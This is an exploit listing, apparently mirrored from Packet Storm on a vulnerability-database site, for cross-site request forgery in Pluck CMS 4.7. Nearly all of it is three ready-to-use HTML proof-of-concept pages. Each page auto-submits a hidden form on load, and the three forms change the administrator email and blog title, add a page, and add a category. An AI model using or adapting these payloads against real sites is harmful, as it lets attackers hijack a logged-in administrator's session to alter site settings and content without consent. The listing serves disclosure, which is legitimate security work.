Lucene search
K

Pluck CMS 4.7 Cross Site Request Forgery

🗓️ 10 Feb 2012 00:00:00Reported by Gordon SecurityType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

Pluck CMS 4.7 C.S.R.F. exploits for changing admin email, blog title, adding a page, and adding categor

Code
`# Exploit Title: Pluck cms multiple vulnerabilit�  
# Date: 09/01/2012  
# Author: Gordon Security  
# Vendor or Software Link: www.pluck-cms.org  
# Version: 4.7  
# Category: webapps  
# Website:www.gordon-security.blogspot.com  
C.S.R.F. #1  
#[p.o.c.] Change admin e-mail and change title blog  
<html>  
<title>Gordon Security</title>  
<body onload="javascript:document.  
forms[0].submit()">  
<H3>www.gordon-security.blogspot.com</H3>  
<H2>CSRF Exploit to change Admin E-mail and Blog Title</H2>  
<form method="POST" name="form0" action="  
http://127.0.0.1:80/pluck/admin.php?action=settings<http://127.0.0.1/pluck/admin.php?action=settings>  
">  
<input type="hidden" name="cont1" value="Gordon Security"/>  
<input type="hidden" name="cont2" value="[email protected]"/>  
<input type="hidden" name="save" value="Salva"/>  
</form>  
</body>  
</html>  
C.S.R.F. #2  
#[p.o.c.] Add page to blog  
<html>  
<title>Gordon Security</title>  
<body onload="javascript:document.forms[0].submit()">  
<H3>www.gordon-security.blogspot.com</H3>  
<H2>CSRF Exploit to add page</H2>  
<form method="POST" name="form0" action="  
http://127.0.0.1:80/pluck/admin.php?action=editpage<http://127.0.0.1/pluck/admin.php?action=editpage>  
">  
<input type="hidden" name="title" value="Exploit"/>  
<input type="hidden" name="content" value="<p>Exploited</p>"/>  
<input type="hidden" name="description" value=""/>  
<input type="hidden" name="keywords" value=""/>  
<input type="hidden" name="hidden" value="no"/>  
<input type="hidden" name="sub_page" value=""/>  
<input type="hidden" name="theme" value="default"/>  
<input type="hidden" name="save_exit" value="Save and Exit"/>  
</form>  
</body>  
</html>  
C.S.R.F #3  
#[p.o.c.] Add categorie  
<html>  
<title>Gordon Security</title>  
<body onload="javascript:document.forms[0].submit()">  
<H3>www.gordon-security.blogspot.com</H3>  
<H2>CSRF Exploit to add categorie</H2>  
<form method="POST" name="form0" action="  
http://127.0.0.1:80/pluck/admin.php?module=blog<http://127.0.0.1/pluck/admin.php?module=blog>  
">  
<input type="hidden" name="cont1" value="Hacking"/>  
<input type="hidden" name="Submit" value="Salva"/>  
</form>  
</body>  
</html>  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation